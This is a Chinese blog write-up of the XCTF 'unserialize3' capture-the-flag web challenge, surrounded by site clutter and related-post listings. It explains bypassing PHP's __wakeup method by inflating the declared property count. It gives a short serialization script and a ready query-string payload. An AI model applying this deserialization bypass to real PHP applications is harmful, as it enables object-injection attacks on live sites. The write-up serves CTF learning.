攻防世界-unserialize3

最新推荐文章于 2024-07-14 22:28:13 发布
最新推荐文章于 2024-07-14 22:28:13 发布
阅读量1k 收藏
点赞数 1
分类专栏: wp 文章标签: web安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_62608816/article/details/125768147
版权

得到源码

class xctf{
public $flag = '111';
public function __wakeup(){
exit('bad requests');
}
?code=
​

这是一个利用反序列字符串来进行绕过的题,根据提示我们要构造code参数,但是需要绕过wakeup函数

查找资料得知wakeup为魔法函数,在进行unserialize反序列化的时候,首先就要查看有无该函数有的话 就会先执行他:

绕过: 通过测试发现可以通过增加对象的属性个数来进行绕过,根据源码编辑php脚本输出序列化字符串:

<?php
class xctf{
public $flag = '111';
public function __wakeup(){
exit('bad requests');
}
}
$c = new xctf();
print(serialize($c));
​
?>

 将对象属性由1变为2得到**

O:4:"xctf":2:{s:4:"flag";s:3:"111";}
​

由此可以构造payload

?code=O:4:"xctf":2:{s:4:"flag";s:3:"111";}
​

拿到flag:

 

r1ng_x
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
攻防世界-unserialize3
weixin_46784800的博客
11-14 915
攻防世界-unserialize3题 _wakeup()函数 顾名思义,与sleep函数相对应,sleep函数用做睡眠,wake_up函数用作唤醒。 在序列化和反序列化的过程中会经常用到wake_up函数,在反序列化时,即执行 unserialize() 函数时,会首先检查实例化对象中是否含有wake_up函数,若含有,则首先调用执行wake_up函数。 wake_up函数的作用: 经常用在反序列化操作中,例如重新建立数据库连接,或执行其它初始化操作。 序列化: 将对象转换成字符串。字符串包括 属性
chrome-unserialize-php-crx插件
04-02
语言:English 将php-serialized数据转换回用于人类可读的... 可以选择var_export或json ... 可以选择var_export或json 无法解决循环参考(如果真的需要,请在Github上提出问题) 谢谢: ... - 固定var_export库未引用对象键
攻防世界--unserialize3 fileinclude
tzyyyyyy的博客
02-06 622
攻防世界--unserialize3 fileinclude
攻防世界web---unserialize3
m0_72447684的博客
10-10 234
攻防世界web---unserialize3
四、攻防世界-unserialize3
pcmbyn的博客
03-21 128
php在线反序列化工具 unserialize serialize。这一道题目设计PHP的序列化和反序列化,具体介绍和题解详见博客。绕过魔法函数wakeup后进行反序列化得到结果。
攻防世界-unserialize3详解
Mr_helloword的博客
08-11 5932
unserialize3 查看源代码: class xctf{ public $flag = '111'; public function __wakeup(){ exit('bad requests'); } ?code= 这是一个利用反序列字符串来进行绕过的题,根据提示我们要构造code参数,但是需要绕过wakeup函数 **__wakeup()**是PHP的一个魔法函数,在进行unserialize反序列化的时候,首先查看有无该函数有的话 就会先执行他 绕过: 可以通过增加对象的属性个数来进行绕过
03攻防世界-unserialize3
weixin_49765221的博客
04-13 380
这种方式能轻松的存储和传输数据,但反序列化有一个漏洞,通过这个漏洞我们可以跳过反序列化操作的执行。但是原代码中并没有序列化所以我们无法进行反序列化,所以我们需要添加一个序列化来将我们的变量变成字符串。而对于反序列化来说如果字符串中的变量的数目和真实的数目不一样那么__wakeup会出现错误,我们就造成了反序列化漏洞,所以我们在填写字符串时将变量值的数目从1改成2,输入网页网址后即可获得flag。序列化的意思是:是将变量转换为可保存或传输的字符串的过程。//定义一个公有的类属性。//输出被序列化的对象。
攻防世界-webunserialize3
weixin_73625393的博客
10-27 521
unserialize()反序列化函数会检查是否存在一个_wakeup()方法。//输出被序列化的对象(a)public function __wakeup(){ //定义公有的类的方法_wakeup()题目中的代码目前没有看见序列化函数,因此传递参数需要自己传递已经序列化的参数,题目中已经提示,传参到code。O::“”::{S:…根据代码审计,构造出来序列化序列后,不能给_wakeup()执行,否则会返回bad request。
攻防世界--unserialize
m0_67467924的博客
03-20 154
例:假设序列化的结果是O:1:"M":1:{s:2:"mm";例:$m=unserialize("O:1:"M":1:{s:2:"mm";其中O表示object,1表示对象名的长度为1个字符,M表示对象的名称为M,1表示对象里面有一个变量,s表示变量的数据类型,2表示变量长度为2个字符,mm:表示变量名,s表示数据类型,2表示变量值的长度,mm表示变量的值为mm。比如该题的值如果使用了serialize($flag)函数序列化,得到的值为:O:4:"xctf":1:{s:4:"flag";
攻防世界-unserialize3 (php反序列化)
qq_51979295的博客
09-17 353
php反序列化;web安全
unserialize:PHP 反序列化的 Node.js 端口
05-29
反序列化 ...安装 npm install unserialize 用法 var unserialize = require('unserialize');...s:3:"age";i:82;}')); // { name: 'Andy', age: 82 } 测验 npm test 作者 Andreas Brekken 执照 国际学习中心
php中unserialize返回false的解决方法
10-25
主要介绍了php中unserialize返回false的解决方法,是PHP程序设计中非常经典的问题,需要的朋友可以参考下
浅谈php函数serialize()与unserialize()的使用方法
10-25
在php中serialize()与unserialize()函数是一对函数,下面本文章就来为各位同学介绍serialize()与unserialize()函数的使用例子,希望能帮助到各位。
【网络安全】基于PHP study的DVWA靶场搭建教程
等风来
07-14 84
接着访问:http://127.0.0.1/dvwa-master,拉到页面最下面点击Create/Reset Databse 跳转至该页面后,输入admin、password即可登录:
网络安全法律框架更新:最新合规要求与企业应对策略
最新发布
2301_79955948的博客
07-14 439
首先,企业应提升网络安全意识,完善责任制度,并关注新法律法规的协调衔接。2022年,《网络安全法》迎来了首次修改,这一修订主要是为了与《数据安全法》和《个人信息保护法》等新实施的法律进行衔接协调,完善法律责任制度,进一步保障网络安全。新规定对原有的触发条件进行了优化,例如,关键信息基础设施运营者向境外提供个人信息或重要数据,以及特定数量的个人信息或敏感个人信息的跨境传输,都需要进行安全评估。通过上述措施,企业不仅能够提升自身的网络安全防护能力,还能促进国内网络安全产业的高质量发展,为国家网络安全贡献力量。
等保测评助力网络安全治理现代化
waitaikong_的博客
07-14 145
等保测评,即信息安全等级保护测评,是依据国家相关法律法规和标准,对信息系统进行安全等级划分和安全性能评估的过程。它涵盖了从技术到管理、从人员到流程的多维度评估,旨在确保信息系统在面对各种威胁时的安全性和可靠性。随着网络技术的发展和网络安全形势的变化,等保测评在网络安全治理现代化中扮演着越来越重要的角色。
如何用IP地址申请SSL证书实现网络安全
2401_84891336的博客
07-10 413
申请IP地址SSL证书
网络安全防御【防火墙安全策略用户认证综合实验】
miss_copper的博客
07-10 1268
先新建一个管理员角色(网络安全管理员):再新建一个管理员(用户名密码自拟):至此本实验全部结束!!!
攻防世界unserialize3
08-02
根据题目的描述,我们可以猜测在攻防世界unserialize3中,需要对传入的code参数进行反序列化操作。由于给出的代码块中有一个xctf类的序列化字符串,我们可以尝试使用unserialize()函数对其进行反序列化。具体的...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

r1ng_x

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值